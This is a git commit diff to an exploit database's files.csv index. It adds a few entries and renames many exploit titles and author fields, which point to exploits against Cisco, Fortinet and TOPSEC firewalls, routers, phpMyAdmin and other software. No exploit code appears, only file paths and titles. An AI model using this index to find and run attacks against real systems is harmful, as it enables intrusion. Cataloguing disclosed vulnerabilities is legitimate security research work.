DB: 2016-09-16
3 new exploits Avaya IP Office Phone Manager - Local Password Disclosure BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities PA168 Chipset IP Phones - Weak Session Management Exploit CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash phpMyAdmin - '/scripts/setup.php' PHP Code Injection NScan 0.9.1 - (Target) Buffer Overflow NScan 0.9.1 - 'Target' Buffer Overflow Xerox WorkCentre - Multiple Models Denial of Service Xerox WorkCentre (Multiple Models) - Denial of Service Cisco EPC 3925 - Multiple Vulnerabilities httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit) Novell eDirectory 8.8sp5 - Buffer Overflow Uebimiau Webmail 3.2.0-2.0 - Email Disclosure ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC) Integard Home and Pro 2 - Remote HTTP Buffer Overflow Multiple D-Link Router Models - Authentication Bypass D-Link Router (Multiple Models) - Authentication Bypass iSO Air Files 2.6 - Directory Traversal iOS FtpDisc 1.0 - Directory Traversal iOS SideBooks 1.0 - Directory Traversal iOS FtpDisc 1.0 - Directory Traversal iOS SideBooks 1.0 - Directory Traversal iSO Filer Lite 2.1.0 - Directory Traversal iOS iDocManager 1.0.0 - Directory Traversal iOS myDBLite 1.1.10 - Directory Traversal iSO Filer Lite 2.1.0 - Directory Traversal iOS iDocManager 1.0.0 - Directory Traversal iOS myDBLite 1.1.10 - Directory Traversal iOS Share 1.0 - Directory Traversal iOS TIOD 1.3.3 - Directory Traversal Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation Zapya Desktop 1.803 - 'ZapyaService.exe' Privilege Escalation Dansie Shopping Cart - Server Error Message Installation Full Path Disclosure Apache/mod_ssl 2.0.x - Remote Denial of Service SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation Airlive IP Cameras - Multiple Vulnerabilities Monkey CMS - Multiple Vulnerabilities NetBSD mail.local - Privilege Escalation (Metasploit) Apache Mina 2.0.13 - Remote Command Execution Apache Mina 2.0.13 - Remote Command Execution DeepOfix SMTP Server 3.3 - Authentication Bypass xEpan 1.0.4 - Multiple Vulnerabilities Humhub 0.10.0-rc.1 - SQL Injection Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities Humhub 0.10.0-rc.1 - SQL Injection Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness Koha 3.20.1 - Multiple SQL Injections Koha 3.20.1 - Directory Traversal Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities Koha 3.20.1 - Multiple SQL Injections Koha 3.20.1 - Directory Traversal Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities 8 TOTOLINK Router Models - Backdoor and Remote Code Execution 8 TOTOLINK Router Models - Backdoor / Remote Code Execution Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow TestLink 1.9.14 - Cross-Site Request Forgery PaKnPost Pro 1.14 - Multiple Vulnerabilities zFTP Client 20061220 - (Connection Name) Local Buffer Overflow zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access Cisco ASA 8.x - Authentication Bypass (EXTRABACON) Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass Watchguard Firewalls - ifconfig Privilege Escalation (ESCALATEPLOWMAN) Cisco ASA / PIX - Privilege Escalation (EPICBANANA) TOPSEC Firewalls - Remote Code Execution (ELIGIBLECONTESTANT) TOPSEC Firewalls - Remote Code Execution (ELIGIBLECANDIDATE) TOPSEC Firewalls - Remote Code Execution (ELIGIBLEBOMBSHELL) TOPSEC Firewalls - Remote Exploit (ELIGIBLEBACHELOR) Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER) Watchguard Firewalls - 'ESCALATEPLOWMAN' ifconfig Privilege Escalation Cisco ASA / PIX - 'EPICBANANA' Privilege Escalation TOPSEC Firewalls - 'ELIGIBLECONTESTANT' Remote Code Execution TOPSEC Firewalls - 'ELIGIBLECANDIDATE' Remote Code Execution TOPSEC Firewalls - 'ELIGIBLEBOMBSHELL' Remote Code Execution TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Exploit Fortigate Firewalls - 'EGREGIOUSBLUNDER' Remote Code Execution tcPbX - (tcpbx_lang) Local File Inclusion tcPbX - 'tcpbx_lang' Local File Inclusion
This commit is contained in:
parent
f1e68e0b1d
commit
751e61a6bf
4 changed files with 1112 additions and 51 deletions
105
files.csv
105
files.csv
|
@ -661,7 +661,7 @@ id,file,description,date,author,platform,type,port
|
|||
836,platforms/windows/local/836.c,"WWW File Share Pro 2.72 - Local Password Disclosure",2005-02-23,Kozan,windows,local,0
|
||||
837,platforms/windows/local/837.c,"Chat Anywhere 2.72a - Local Password Disclosure",2005-02-23,Kozan,windows,local,0
|
||||
838,platforms/multiple/dos/838.pl,"webconnect 6.4.4 < 6.5 - Directory Traversal / Denial of Service",2005-02-24,karak0rsan,multiple,dos,0
|
||||
839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0
|
||||
839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager - Local Password Disclosure",2005-02-24,"Adrian _pagvac_ Pastor",windows,local,0
|
||||
840,platforms/cgi/webapps/840.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0
|
||||
841,platforms/windows/dos/841.c,"Soldier of Fortune 2 1.03 - 'cl_guid' Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0
|
||||
842,platforms/linux/dos/842.c,"WU-FTPD 2.6.2 - File Globbing Denial of Service",2005-02-25,str0ke,linux,dos,0
|
||||
|
@ -1743,7 +1743,7 @@ id,file,description,date,author,platform,type,port
|
|||
2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'logrotate prctl()' Privilege Escalation",2006-07-18,"Marco Ivaldi",linux,local,0
|
||||
2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Blind SQL Injection",2006-07-18,"Jacek Wlodarczyk",php,webapps,0
|
||||
2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection (2)",2006-07-18,"w4g.not null",php,webapps,0
|
||||
2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0
|
||||
2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian _pagvac_ Pastor",hardware,remote,0
|
||||
2035,platforms/php/webapps/2035.php,"ToendaCMS 1.0.0 - 'FCKeditor' Arbitrary File Upload",2006-07-18,rgod,php,webapps,0
|
||||
2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps,0
|
||||
2037,platforms/windows/dos/2037.c,"Dumb 0.9.3 - (it_read_envelope) Remote Heap Overflow (PoC)",2006-07-19,"Luigi Auriemma",windows,dos,0
|
||||
|
@ -2862,7 +2862,7 @@ id,file,description,date,author,platform,type,port
|
|||
3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 - (config.php sql_language) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0
|
||||
3186,platforms/asp/webapps/3186.txt,"ASP EDGE 1.2b - (user.asp) SQL Injection",2007-01-24,ajann,asp,webapps,0
|
||||
3187,platforms/asp/webapps/3187.txt,"ASP NEWS 3.0 - (news_detail.asp) SQL Injection",2007-01-24,ajann,asp,webapps,0
|
||||
3189,platforms/hardware/remote/3189.sh,"PA168 Chipset IP Phones - Weak Session Management Exploit",2007-01-24,"Adrian ""pagvac"" Pastor",hardware,remote,0
|
||||
3189,platforms/hardware/remote/3189.sh,"PA168 Chipset IP Phones - Weak Session Management Exploit",2007-01-24,"Adrian _pagvac_ Pastor",hardware,remote,0
|
||||
3190,platforms/windows/dos/3190.py,"Microsoft Windows - Explorer (.AVI) Unspecified Denial of Service",2007-01-24,shinnai,windows,dos,0
|
||||
3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 - (MODULES_DIR) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0
|
||||
3192,platforms/php/webapps/3192.pl,"Xero Portal - 'phpbb_root_path' Remote File Inclusion",2007-01-24,"Mehmet Ince",php,webapps,0
|
||||
|
@ -6709,7 +6709,7 @@ id,file,description,date,author,platform,type,port
|
|||
7147,platforms/php/webapps/7147.txt,"SaturnCMS - (view) Blind SQL Injection",2008-11-17,"Hussin X",php,webapps,0
|
||||
7148,platforms/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - (index.php serverid) SQL Injection",2008-11-17,eek,php,webapps,0
|
||||
7149,platforms/php/webapps/7149.php,"VideoScript 4.0.1.50 - Admin Change Password Exploit",2008-11-17,G4N0K,php,webapps,0
|
||||
7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash",2008-11-18,"Adrian ""pagvac"" Pastor",linux,dos,0
|
||||
7150,platforms/linux/dos/7150.html,"CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash",2008-11-18,"Adrian _pagvac_ Pastor",linux,dos,0
|
||||
7151,platforms/linux/remote/7151.c,"No-IP DUC 2.1.7 - Remote Code Execution",2008-11-18,XenoMuta,linux,remote,0
|
||||
7152,platforms/php/webapps/7152.txt,"MusicBox 2.3.8 - (viewalbums.php artistId) SQL Injection",2008-11-18,snakespc,php,webapps,0
|
||||
7153,platforms/php/webapps/7153.txt,"Pluck CMS 4.5.3 - (g_pcltar_lib_dir) Local File Inclusion",2008-11-18,DSecRG,php,webapps,0
|
||||
|
@ -8416,7 +8416,7 @@ id,file,description,date,author,platform,type,port
|
|||
8918,platforms/php/webapps/8918.txt,"MRCGIGUY Hot Links - 'report.php id' SQL Injection",2009-06-09,"ThE g0bL!N",php,webapps,0
|
||||
8919,platforms/php/webapps/8919.txt,"Joomla! Component com_realestatemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0
|
||||
8920,platforms/php/webapps/8920.txt,"Joomla! Component com_vehiclemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0
|
||||
8921,platforms/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian ""pagvac"" Pastor",php,webapps,0
|
||||
8921,platforms/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian _pagvac_ Pastor",php,webapps,0
|
||||
8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection",2009-06-10,"Core Security",windows,remote,0
|
||||
8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x - System Config Disclosure",2009-06-10,StAkeR,php,webapps,0
|
||||
8924,platforms/php/webapps/8924.txt,"School Data Navigator - (page) Local / Remote File Inclusion",2009-06-10,Br0ly,php,webapps,0
|
||||
|
@ -8721,7 +8721,7 @@ id,file,description,date,author,platform,type,port
|
|||
9242,platforms/windows/dos/9242.py,"WzdFTPD 8.0 - Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos,0
|
||||
9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0
|
||||
9244,platforms/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0
|
||||
40297,platforms/windows/local/40297.py,"NScan 0.9.1 - (Target) Buffer Overflow",2016-08-29,hyp3rlinx,windows,local,0
|
||||
40297,platforms/windows/local/40297.py,"NScan 0.9.1 - 'Target' Buffer Overflow",2016-08-29,hyp3rlinx,windows,local,0
|
||||
9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0
|
||||
9247,platforms/osx/remote/9247.py,"Mozilla Firefox 3.5 (OSX) - (Font tags) Remote Buffer Overflow",2009-07-24,Dr_IDE,osx,remote,0
|
||||
9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Authentication Bypass) SQL Injection",2009-07-24,SwEET-DeViL,php,webapps,0
|
||||
|
@ -8981,7 +8981,8 @@ id,file,description,date,author,platform,type,port
|
|||
9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - 'id' SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0
|
||||
9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass",2009-08-25,Securitylab.ir,php,webapps,0
|
||||
9513,platforms/linux/local/9513.c,"Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure (PoC)",2009-08-25,"Jon Oberheide",linux,local,0
|
||||
9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre - Multiple Models Denial of Service",2009-08-25,"Henri Lindberg",hardware,dos,0
|
||||
9514,platforms/hardware/dos/9514.py,"Xerox WorkCentre (Multiple Models) - Denial of Service",2009-08-25,"Henri Lindberg",hardware,dos,0
|
||||
40383,platforms/asp/webapps/40383.txt,"Cisco EPC 3925 - Multiple Vulnerabilities",2016-09-15,"Patryk Bogdan",asp,webapps,80
|
||||
9515,platforms/windows/dos/9515.txt,"Cerberus FTP 3.0.1 - (ALLO) Remote Overflow Denial of Service (Metasploit)",2009-08-25,"Francis Provencher",windows,dos,0
|
||||
9516,platforms/windows/dos/9516.txt,"Novell Client for Windows 2000/XP - ActiveX Remote Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0
|
||||
9517,platforms/windows/dos/9517.txt,"Lotus note connector for BlackBerry Manager 5.0.0.11 - ActiveX Denial of Service",2009-08-25,"Francis Provencher",windows,dos,0
|
||||
|
@ -9270,7 +9271,7 @@ id,file,description,date,author,platform,type,port
|
|||
9882,platforms/windows/local/9882.txt,"Firefox 3.5.3 - Local Download Manager Temp File Creation",2009-10-28,"Jeremy Brown",windows,local,0
|
||||
9884,platforms/windows/local/9884.txt,"GPG2/Kleopatra 2.0.11 - Malformed Certificate (PoC)",2009-10-21,Dr_IDE,windows,local,0
|
||||
9885,platforms/windows/webapps/9885.txt,"httpdx 1.4.6b - source Disclosure",2009-10-21,Dr_IDE,windows,webapps,0
|
||||
9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli, Trancer",windows,remote,0
|
||||
9886,platforms/windows/remote/9886.txt,"httpdx 1.4 - h_handlepeer Buffer Overflow (Metasploit)",2009-10-16,"Pankaj Kohli_ Trancer",windows,remote,0
|
||||
9887,platforms/jsp/webapps/9887.txt,"jetty 6.x < 7.x - Cross-Site Scripting / Information Disclosure / Injection",2009-10-26,"Antonion Parata",jsp,webapps,0
|
||||
9888,platforms/php/webapps/9888.txt,"Joomla! Component Ajax Chat 1.0 - Remote File Inclusion",2009-10-19,kaMtiEz,php,webapps,0
|
||||
9889,platforms/php/webapps/9889.txt,"Joomla! Component Book Library 1.0 - File Inclusion",2009-10-19,kaMtiEz,php,webapps,0
|
||||
|
@ -9285,7 +9286,7 @@ id,file,description,date,author,platform,type,port
|
|||
9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Folder Disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0
|
||||
9900,platforms/windows/remote/9900.txt,"NaviCOPA 3.0.1.2 - Source Disclosure",2009-10-14,Dr_IDE,windows,remote,0
|
||||
9901,platforms/linux/dos/9901.txt,"Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - (PoC)",2009-10-23,"Zeus Penguin",linux,dos,80
|
||||
9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Buffer Overflow",2009-10-26,"karak0rsan, murderkey",windows,remote,80
|
||||
9902,platforms/windows/remote/9902.txt,"Novell eDirectory 8.8sp5 - Buffer Overflow",2009-10-26,"karak0rsan_ murderkey",windows,remote,80
|
||||
9903,platforms/php/webapps/9903.txt,"OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection",2009-10-20,"Amol Naik",php,webapps,0
|
||||
9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0
|
||||
9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521
|
||||
|
@ -10670,7 +10671,7 @@ id,file,description,date,author,platform,type,port
|
|||
11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
|
||||
11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
|
||||
11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0
|
||||
11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0
|
||||
11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re_ R4vax",php,webapps,0
|
||||
11667,platforms/php/webapps/11667.txt,"Joomla! Component com_hezacontent 1.0 - 'id' SQL Injection",2010-03-09,kaMtiEz,php,webapps,0
|
||||
11668,platforms/windows/remote/11668.rb,"Easy FTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0
|
||||
11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - (argument) Local Crash",2010-03-09,l3D,windows,dos,0
|
||||
|
@ -11436,7 +11437,7 @@ id,file,description,date,author,platform,type,port
|
|||
12526,platforms/asp/webapps/12526.txt,"ArticleLive (Interspire Website Publisher) - SQL Injection",2010-05-07,Ra3cH,asp,webapps,0
|
||||
12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass",2010-05-07,Ra3cH,asp,dos,0
|
||||
12528,platforms/windows/local/12528.pl,"AVCON H323Call - Buffer Overflow",2010-05-07,"Dillon Beresford",windows,local,0
|
||||
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry, eSage Lab",windows,dos,0
|
||||
12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 AntiVirus 4.2 (x32/x64) - LZH archive parsing (PoC)",2010-05-07,"Oleksiuk Dmitry_ eSage Lab",windows,dos,0
|
||||
12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow Denial of Service (Metasploit)",2010-05-08,"Jeremiah Talamantes",windows,dos,0
|
||||
12531,platforms/windows/dos/12531.pl,"GeoHttpServer - Remote Denial of Service",2010-05-08,aviho1,windows,dos,0
|
||||
12532,platforms/php/webapps/12532.txt,"B2B Classic Trading Script - 'offers.php' SQL Injection",2010-05-08,v3n0m,php,webapps,0
|
||||
|
@ -13048,7 +13049,7 @@ id,file,description,date,author,platform,type,port
|
|||
14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - '.wav' Denial of Service",2010-09-07,s-dz,windows,dos,0
|
||||
14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos,0
|
||||
14943,platforms/asp/webapps/14943.txt,"sirang web-based d-control - Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0
|
||||
14941,platforms/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln, Nullthreat, rick2600",win_x86,remote,80
|
||||
14941,platforms/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln_ Nullthreat_ rick2600",win_x86,remote,80
|
||||
14944,platforms/windows/local/14944.py,"Microsoft Visio 2002 - '.DXF' File Stack based Overflow",2010-09-08,Abysssec,windows,local,0
|
||||
14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0
|
||||
14949,platforms/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos,0
|
||||
|
@ -13606,7 +13607,7 @@ id,file,description,date,author,platform,type,port
|
|||
15663,platforms/windows/local/15663.py,"Mediacoder 0.7.5.4797 - '.m3u' Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0
|
||||
15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0
|
||||
15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - 'travelbycountry.asp' SQL Injection",2010-12-03,"Ulrik Persson",asp,webapps,0
|
||||
15666,platforms/hardware/webapps/15666.txt,"Multiple D-Link Router Models - Authentication Bypass",2010-12-03,"Craig Heffner",hardware,webapps,0
|
||||
15666,platforms/hardware/webapps/15666.txt,"D-Link Router (Multiple Models) - Authentication Bypass",2010-12-03,"Craig Heffner",hardware,webapps,0
|
||||
15668,platforms/windows/remote/15668.html,"Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0
|
||||
15669,platforms/windows/dos/15669.py,"MediaMonkey 3.2.4.1304 - (mp3) Buffer Overflow (PoC)",2010-12-04,0v3r,windows,dos,0
|
||||
15670,platforms/windows/dos/15670.pl,"Free Audio Converter 7.1.5 - Denial of Service (PoC)",2010-12-04,h1ch4m,windows,dos,0
|
||||
|
@ -14019,7 +14020,7 @@ id,file,description,date,author,platform,type,port
|
|||
16192,platforms/linux/dos/16192.pl,"Novell Iprint - LPD Remote Code Execution",2011-02-18,"Francis Provencher",linux,dos,0
|
||||
16254,platforms/windows/dos/16254.txt,"Nitro PDF Reader 1.4.0 - Heap Memory Corruption (PoC)",2011-02-28,LiquidWorm,windows,dos,0
|
||||
16225,platforms/cfm/webapps/16225.txt,"Alcassoft's SOPHIA CMS - SQL Injection",2011-02-24,p0pc0rn,cfm,webapps,0
|
||||
16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
|
||||
16226,platforms/hardware/remote/16226.txt,"iSO Air Files 2.6 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",hardware,remote,0
|
||||
16196,platforms/php/webapps/16196.txt,"eventum issue tracking system 2.3.1 - Persistent Cross-Site Scripting",2011-02-19,"Saif El-Sherei",php,webapps,0
|
||||
16197,platforms/php/webapps/16197.txt,"Escort Directory CMS - SQL Injection",2011-02-19,NoNameMT,php,webapps,0
|
||||
16198,platforms/php/webapps/16198.txt,"Independent Escort CMS - Blind SQL Injection",2011-02-19,NoNameMT,php,webapps,0
|
||||
|
@ -14033,8 +14034,8 @@ id,file,description,date,author,platform,type,port
|
|||
16206,platforms/php/webapps/16206.txt,"Galilery 1.0 - Local File Inclusion",2011-02-22,lemlajt,php,webapps,0
|
||||
16207,platforms/php/webapps/16207.txt,"dotProject 2.1.5 - Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps,0
|
||||
16216,platforms/linux/dos/16216.txt,"Red Hat Linux - stickiness of /tmp",2011-02-23,"Tavis Ormandy",linux,dos,0
|
||||
16208,platforms/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
|
||||
16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
|
||||
16208,platforms/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
|
||||
16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
|
||||
16222,platforms/php/webapps/16222.txt,"course registration management system 2.1 - Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps,0
|
||||
16223,platforms/php/webapps/16223.txt,"VidiScript - SQL Injection",2011-02-23,ThEtA.Nu,php,webapps,0
|
||||
16220,platforms/php/webapps/16220.py,"ProQuiz 2.0.0b - Arbitrary File Upload",2011-02-23,"AutoSec Tools",php,webapps,0
|
||||
|
@ -14042,11 +14043,11 @@ id,file,description,date,author,platform,type,port
|
|||
16213,platforms/php/webapps/16213.txt,"Hyena Cart - 'index.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
|
||||
16214,platforms/php/webapps/16214.txt,"tplSoccerStats - 'player.php' SQL Injection",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0
|
||||
16217,platforms/php/webapps/16217.txt,"bitweaver 2.8.1 - Persistent Cross-Site Scripting",2011-02-23,lemlajt,php,webapps,0
|
||||
16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",hardware,remote,0
|
||||
16228,platforms/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
|
||||
16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
|
||||
16227,platforms/hardware/remote/16227.txt,"iSO Filer Lite 2.1.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",hardware,remote,0
|
||||
16228,platforms/ios/remote/16228.txt,"iOS iDocManager 1.0.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
|
||||
16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
|
||||
16230,platforms/windows/dos/16230.py,"Victory FTP Server 5.0 - Denial of Service",2011-02-24,"C4SS!0 G0M3S",windows,dos,0
|
||||
16231,platforms/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0
|
||||
16231,platforms/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
|
||||
16232,platforms/php/webapps/16232.txt,"WordPress Plugin GigPress 2.1.10 - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0
|
||||
16233,platforms/php/webapps/16233.txt,"WordPress Plugin Relevanssi 2.7.2 - Persistent Cross-Site Scripting",2011-02-24,"Saif El-Sherei",php,webapps,0
|
||||
16234,platforms/netware/dos/16234.rb,"Novell Netware - RPC XNFS xdrDecodeString",2011-02-24,"Francis Provencher",netware,dos,0
|
||||
|
@ -14081,7 +14082,7 @@ id,file,description,date,author,platform,type,port
|
|||
16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0
|
||||
16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps,0
|
||||
16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
|
||||
16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",ios,remote,0
|
||||
16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt_ H@ckk3y",ios,remote,0
|
||||
16273,platforms/php/webapps/16273.php,"WordPress Plugin PHP Speedy 0.5.2 - (admin_container.php) Remote Code Execution",2011-03-04,mr_me,php,webapps,0
|
||||
16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Exploit",2011-03-04,kingcope,jsp,webapps,0
|
||||
16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Root Exploit",2011-03-04,"Todor Donev",hardware,remote,0
|
||||
|
@ -18954,7 +18955,7 @@ id,file,description,date,author,platform,type,port
|
|||
40362,platforms/windows/local/40362.txt,"Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
|
||||
